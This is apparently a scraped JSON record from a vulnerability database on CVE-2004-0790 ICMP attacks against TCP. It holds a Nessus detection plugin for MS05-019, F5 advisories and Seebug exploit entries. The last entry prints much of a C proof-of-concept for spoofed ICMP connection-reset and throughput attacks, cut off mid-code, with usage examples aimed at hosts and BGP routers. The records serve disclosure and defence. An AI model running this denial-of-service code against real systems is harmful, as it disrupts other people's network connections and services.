(bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:17:28", "description": "The remote host runs a version of Windows that has a flaw in its TCP/IP stack.\n\nThe flaw could allow an attacker to execute arbitrary code with SYSTEM privileges on the remote host, or to perform a denial of service attack against the remote host.\n\nProof of concept code is available to perform a Denial of Service against a vulnerable system.", "cvss3": {"score": null, "vector": null}, "published": "2005-04-12T00:00:00", "type": "nessus", "title": "MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0230", "CVE-2004-0790", "CVE-2004-1060", "CVE-2005-0048", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068", "CVE-2005-0688"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS05-019.NASL", "href": "https://www.tenable.com/plugins/nessus/18023", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18023);\n script_version(\"1.43\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2004-0230\",\n \"CVE-2004-0790\",\n \"CVE-2004-1060\",\n \"CVE-2005-0048\",\n \"CVE-2005-0065\",\n \"CVE-2005-0066\",\n \"CVE-2005-0067\",\n \"CVE-2005-0068\",\n \"CVE-2005-0688\"\n );\n script_bugtraq_id(13116, 13124, 13658);\n script_xref(name:\"MSFT\", value:\"MS05-019\");\n script_xref(name:\"CERT\", value:\"222750\");\n script_xref(name:\"CERT\", value:\"233754\");\n script_xref(name:\"CERT\", value:\"396645\");\n script_xref(name:\"CERT\", value:\"415294\");\n script_xref(name:\"EDB-ID\", value:\"276\");\n script_xref(name:\"EDB-ID\", value:\"291\");\n script_xref(name:\"EDB-ID\", value:\"861\");\n script_xref(name:\"EDB-ID\", value:\"948\");\n script_xref(name:\"EDB-ID\", value:\"24030\");\n script_xref(name:\"EDB-ID\", value:\"24031\");\n script_xref(name:\"EDB-ID\", value:\"24032\");\n script_xref(name:\"EDB-ID\", value:\"24033\");\n script_xref(name:\"EDB-ID\", value:\"25383\");\n script_xref(name:\"EDB-ID\", value:\"25388\");\n script_xref(name:\"EDB-ID\", value:\"25389\");\n script_xref(name:\"MSKB\", value:\"893066\");\n\n script_name(english:\"MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066)\");\n script_summary(english:\"Checks the remote registry for 893066\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\nTCP/IP stack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host runs a version of Windows that has a flaw in its TCP/IP\nstack.\n\nThe flaw could allow an attacker to execute arbitrary code with SYSTEM\nprivileges on the remote host, or to perform a denial of service attack\nagainst the remote host.\n\nProof of concept code is available to perform a Denial of Service\nagainst a vulnerable system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS05-019';\nkb = '893066';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'3,4', xp:'1,2', win2003:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Tcpip.sys\", version:\"5.2.3790.336\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Tcpip.sys\", version:\"5.1.2600.1693\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Tcpip.sys\", version:\"5.1.2600.2685\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Tcpip.sys\", version:\"5.0.2195.7049\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "f5": [{"lastseen": "2021-06-08T18:49:12", "description": "This vulnerability describes the use of spoofed ICMP packets to affect existing TCP connections. An attacker could cause a TCP connection to be closed or slowed by interfering with the Path MTU Discovery process or by generating one of the following spoofed ICMP messages:\n\n * Destination unreachable\n * Protocol unreachable\n * Port unreachable\n * Fragmentation needed and DF bit set\n\nBIG-IP\n\nF5 Product Development has determined the BIG-IP management interface was affected by this vulnerability. F5 Product Development tracked this issue as CR47296, CR48262, and CR48313 and it was fixed in BIG-IP 9.1. To resolve this issue, upgrade to BIG-IP 9.1 or later. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>) release notes.\n\nAdditionally, security updates for versions 9.0.3, 9.0.4, and 9.0.5 that address the management interface vulnerability are available. Download the update, **vu222750_cr47296**, from the F5 [Downloads](<https://downloads.f5.com>) site. For information about how to download software, refer to SOL167: Downloading software and firmware from F5.\n\nF5 had initially determined that due to security enhancements made to the method in which BIG-IP handles ICMP, that the BIG-IP Local Traffic Manager was not vulnerable to exploitation of the issues described in VU#222750 / CVE-2004-0790.\n\nHowever, it was later determined that **fastl4** virtual servers are vulnerable. This issue was tracked as ID 356287 and it was fixed in BIG-IP 10.2.3 and in cumulative hotfix BIG-IP 10.2.2 HF2. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>) release notes.\n\nFirePass\n\nFirePass 5.0.0 and later are not vulnerable to the attacks described in VU#222750 / CVE-2004-0790.\n\nIn addition to validating source and destination ports and IP addresses, FirePass also validates TCP sequence numbers for TCP headers in an ICMP error packet's payload.\n\nFirePass will discard an ICMP packet if the packet does not contain a sequence number or if the packet contains sequence numbers that are not in the proper range for an existing TCP connection.\n\nAn attack, like the one described in VU#22750, which uses ICMP types such as ICMP Unreachables (type 3) or Source Quench (type 4), with payloads of TCP/IP headers that have only the correct IP address and TCP port pairs, will not prompt FirePass to terminate or slow existing connections.\n", "cvss3": {}, "published": "2007-05-16T00:00:00", "type": "f5", "title": "SOL4583 - Insufficient validation of ICMP error messages - VU#222750 / CVE-2004-0790", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790"], "modified": "2016-07-25T00:00:00", "id": "SOL4583", "href": "http://support.f5.com/kb/en-us/solutions/public/4000/500/sol4583.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-04-06T22:40:33", "description": "\nF5 Product Development has assigned ID 635933 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H23440942 on the **Diagnostics** &gt; **Identified** &gt; **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.4.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nBIG-IP PSM | None | 11.4.0 - 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF11 \n12.1.2 HF11 \n11.6.0 - 11.6.11 | Low | Accelerated FastL4 virtual server connection flows on ePVA equipped platforms \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.1.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n1The fix in BIG-IP 13.0.0 HF1, 12.1.2 HF1, 11.6.1 HF2, and 11.5.4 HF3 introduces the **Pva.ValidateTcpSeqInICMP** database variable set to a default value of **true**. With this value set to **true**, the BIG-IP system is not vulnerable to CVE-2004-0790. However, some specific FastL4 accelerated traffic conditions may require the **Pva.Validate.TcpSeqInICMP** database variable to be configured as **False**. With this value set to **false**, FastL4 virtual server connections are susceptible to CVE-2004-0790.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K12837: Overview of the ePVA feature](<https://support.f5.com/csp/article/K12837>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "cvss3": {}, "published": "2017-05-06T01:38:00", "type": "f5", "title": "Insufficient validation of ICMP error messages CVE-2004-0790 (11.x - 13.x)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0066", "CVE-2004-0791", "CVE-2005-0065", "CVE-2004-0790", "CVE-2005-0068", "CVE-2005-0067", "CVE-2004-1060"], "modified": "2019-05-09T00:26:00", "id": "F5:K23440942", "href": "https://support.f5.com/csp/article/K23440942", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:39:40", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple Vendor ICMP Implementation Malformed Path MTU DoS", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79051", "id": "SSV:79051", "sourceData": "\n source: http://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn&#39;t recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a &#39;hard&#39; ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttp://www.exploit-db.com/sploits/25388.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79051", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T22:34:49", "description": "No description provided by source.", "cvss3": {}, "published": "2005-04-20T00:00:00", "title": "Multiple OS (win32/aix/cisco) Crafted ICMP Messages DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2005-04-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15543", "id": "SSV:15543", "sourceData": "\n /* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2004-2005 houseofdabus.\r\n*\r\n* (MS05-019) (CISCO:20050412)\r\n* ICMP attacks against TCP (Proof-of-Concept)\r\n*\r\n*\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n*\r\n*\r\n* [ for more details:\r\n* [ http://www.livejournal.com/users/houseofdabus\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Cisco Content Services Switch 11000 Series (WebNS)\r\n* - Cisco Global Site Selector (GSS) 4480 1.x\r\n* - Cisco IOS 10.x\r\n* - Cisco IOS 11.x\r\n* - Cisco IOS 12.x\r\n* - Cisco IOS R11.x\r\n* - Cisco IOS R12.x\r\n* - Cisco IOS XR (CRS-1) 3.x\r\n* - Cisco ONS 15000 Series\r\n* - Cisco PIX 6.x\r\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\r\n* - AIX 5.x\r\n* - Windows Server 2003\r\n* - Windows XP SP2\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Windows 2000 SP3\r\n* ...\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A denial of service vulnerability exists that could allow an\r\n* attacker to send a specially crafted Internet Control Message\r\n* Protocol (ICMP) message to an affected system. An attacker who\r\n* successfully exploited this vulnerability could cause the affected\r\n* system to reset existing TCP connections, reduce the throughput\r\n* in existing TCP connections, or consume large amounts of CPU and\r\n* memory resources.\r\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\r\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\r\n*\r\n* Other References:\r\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\n* http://www.kb.cert.org/vuls/id/222750\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows Server 2003\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Cisco IOS 11.x\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Examples:\r\n*\r\n* client &lt;---&gt; router &lt;---&gt; router &lt;---&gt; server\r\n*\r\n* CLIENT &lt;---&gt; SERVER\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\r\n* (abort the connection)\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n*\r\n* ROUTER1 &lt;---&gt; ROUTER2\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\r\n* (DoS Cisco BGP Connections)\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*/\r\n\r\n/* #define _WIN32 */\r\n\r\n#ifdef _WIN32\r\n#pragma comment(lib,&quot;ws2_32&quot;)\r\n#pragma pack(1)\r\n#define WIN32_LEAN_AND_MEAN\r\n#include &lt;winsock2.h&gt;\r\n/* IP_HDRINCL */\r\n#include &lt;ws2tcpip.h&gt;\r\n\r\n#else\r\n#include &lt;sys/types.h&gt;\r\n#include &lt;netinet/in.h&gt;\r\n#include &lt;sys/socket.h&gt;\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;arpa/inet.h&gt;\r\n#include &lt;netdb.h&gt;\r\n#include &lt;sys/timeb.h&gt;\r\n#endif\r\n\r\n#include &lt;string.h&gt;\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\n#define MAX_PACKET 4096\r\n\r\n#define DEFAULT_PORT 80\r\n#define DEFAULT_IP &quot;192.168.0.1&quot;\r\n#define DEFAULT_COUNT 1\r\n\r\n/* Define the IP header */\r\ntypedef struct ip_hdr {\r\n unsigned char ip_verlen; /* IP version &amp; length */\r\n unsigned char ip_tos; /* IP type of service */\r\n unsigned short ip_totallength; /* Total length */\r\n unsigned short ip_id; /* Unique identifier */\r\n unsigned short ip_offset; /* Fragment offset field */\r\n unsigned char ip_ttl; /* Time to live */\r\n unsigned char ip_protocol; /* Protocol */\r\n unsigned short ip_checksum; /* IP checksum */\r\n unsigned int ip_srcaddr; /* Source address */\r\n unsigned int ip_destaddr; /* Destination address */\r\n} IP_HDR, *PIP_HDR;\r\n\r\n/* Define the ICMP header */\r\n/* Destination Unreachable Message */\r\ntypedef struct icmp_hdr {\r\n unsigned char type; /* Type */\r\n unsigned char code; /* Code */\r\n unsigned short checksum; /* Checksum */\r\n unsigned long unused; /* Unused */\r\n} ICMP_HDR, *PICMP_HDR;\r\n\r\n/* 64 bits of Original Data Datagram (TCP header) */\r\nchar msg[] =\r\n&quot;\\x00\\x50&quot; /* Source port */\r\n&quot;\\x00\\x50&quot; /* Destination port */\r\n&quot;\\x23\\x48\\x4f\\x44&quot;;\r\n\r\n/* globals */\r\nunsigned long dwToIP, /* IP to send to */\r\n dwFromIP; /* IP to send from (spoof) */\r\nunsigned short iToPort, /* Port to send to */\r\n iFromPort; /* Port to send from (spoof) */\r\nunsigned long dwCount; /* Number of times to send */\r\nunsigned long Attack;\r\n\r\nvoid\r\nusage(char *progname) {\r\n printf(&quot;Usage:\\n\\n&quot;);\r\n printf(&quot;%s &lt;-fi:SRC-IP&gt; &lt;-ti:VICTIM-IP&gt; &lt;-fi:SRC-PORT&gt; [-tp:int] [-a:int] [-n:int]\\n\\n&quot;, progname);\r\n printf(&quot; -fi:IP From (sender) IP address\\n&quot;);\r\n printf(&quot; -ti:IP To (target) IP address\\n&quot;);\r\n printf(&quot; -fp:int Target open TCP port number\\n&quot;);\r\n printf(&quot; (for example - 21, 25, 80)\\n&quot;);\r\n printf(&quot; -tp:int Inicial value for bruteforce (sender) TCP port number\\n&quot;);\r\n printf(&quot; (default: 0 = range of ports 0-65535)\\n&quot;);\r\n printf(&quot; -n:int Number of packets\\n\\n&quot;);\r\n printf(&quot; -a:int ICMP attacks:\\n&quot;);\r\n printf(&quot; 1 - Blind connection-reset attack\\n&quot;);\r\n printf(&quot; (ICMP protocol unreachable)\\n&quot;);\r\n printf(&quot; 2 - Path MTU discovery attack\\n&quot;);\r\n printf(&quot; (slow down the transmission rate)\\n&quot;);\r\n printf(&quot; 3 - ICMP Source Quench attack\\n&quot;);\r\n exit(1);\r\n}\r\n\r\nvoid\r\nValidateArgs(int argc, char **argv)\r\n{\r\n int i;\r\n\r\n iToPort = 0;\r\n iFromPort = DEFAULT_PORT;\r\n dwToIP = inet_addr(DEFAULT_IP);\r\n dwFromIP = inet_addr(DEFAULT_IP);\r\n dwCount = DEFAULT_COUNT;\r\n Attack = 1;\r\n\r\n for (i = 1; i &lt; argc; i++) {\r\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\r\n switch (tolower(argv[i][1])) {\r\n case 'f':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) &gt; 4)\r\n iFromPort = atoi(&amp;argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) &gt; 4)\r\n dwFromIP = inet_addr(&amp;argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 't':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) &gt; 4)\r\n iToPort = atoi(&amp;argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) &gt; 4)\r\n dwToIP = inet_addr(&amp;argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 'n':\r\n if (strlen(argv[i]) &gt; 3)\r\n dwCount = atol(&amp;argv[i][3]);\r\n break;\r\n case 'a':\r\n if (strlen(argv[i]) &gt; 3)\r\n Attack = atol(&amp;argv[i][3]);\r\n if ((Attack &gt; 3) || (Attack &lt; 1))\r\n usage(argv[0]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\n/* This function calculates the 16-bit one's complement sum */\r\n/* for the supplied buffer */\r\nunsigned short\r\nchecksum(unsigned short *buffer, int size)\r\n{\r\n unsigned long cksum = 0;\r\n\r\n while (size &gt; 1) {\r\n cksum += *buffer++;\r\n size -= sizeof(unsigned short);\r\n }\r\n if (size) {\r\n cksum += *(unsigned char *)buffer;\r\n }\r\n cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);\r\n cksum += (cksum &gt;&gt;16);\r\n\r\n return (unsigned short)(~cksum);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\r\n#ifdef _WIN32\r\n WSADATA wsd;\r\n#endif\r\n int s;\r\n#ifdef _WIN32\r\n BOOL bOpt;\r\n#else\r\n int bOpt;\r\n#endif\r\n struct sockaddr_in remote;\r\n IP_HDR ipHdr,\r\n ipHdrInc;\r\n ICMP_HDR icmpHdr;\r\n int ret;\r\n unsigned long i, p;\r\n unsigned short iTotalSize,\r\n iIPVersion,\r\n iIPSize,\r\n p2,\r\n cksum = 0;\r\n char buf[MAX_PACKET],\r\n *ptr = NULL;\r\n#ifdef _WIN32\r\n IN_ADDR addr;\r\n#else\r\n struct sockaddr_in addr;\r\n#endif\r\n\r\n printf(&quot;\\n (MS05-019) (CISCO:20050412)\\n&quot;);\r\n printf(&quot; ICMP attacks against TCP (Proof-of-Concept)\\n\\n&quot;);\r\n printf(&quot; Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n&quot;);\r\n\r\n if (argc &lt; 3) usage(argv[0]);\r\n\r\n /* Parse command line arguments and print them out */\r\n ValidateArgs(argc, argv);\r\n#ifdef _WIN32\r\n addr.S_un.S_addr = dwFromIP;\r\n printf(&quot;[*] From IP: &lt;%s&gt;, port: %d\\n&quot;, inet_ntoa(addr), iFromPort);\r\n addr.S_un.S_addr = dwToIP;\r\n printf(&quot;[*] To IP: &lt;%s&gt;, port: %d\\n&quot;, inet_ntoa(addr), iToPort);\r\n printf(&quot;[*] Count: %d\\n&quot;, dwCount);\r\n#else\r\n addr.sin_addr.s_addr = dwFromIP;\r\n printf(&quot;[*] From IP: &lt;%s&gt;, port: %d\\n&quot;, inet_ntoa(addr.sin_addr), iFromPort);\r\n addr.sin_addr.s_addr = dwToIP;\r\n printf(&quot;[*] To IP: &lt;%s&gt;, port: %d\\n&quot;, 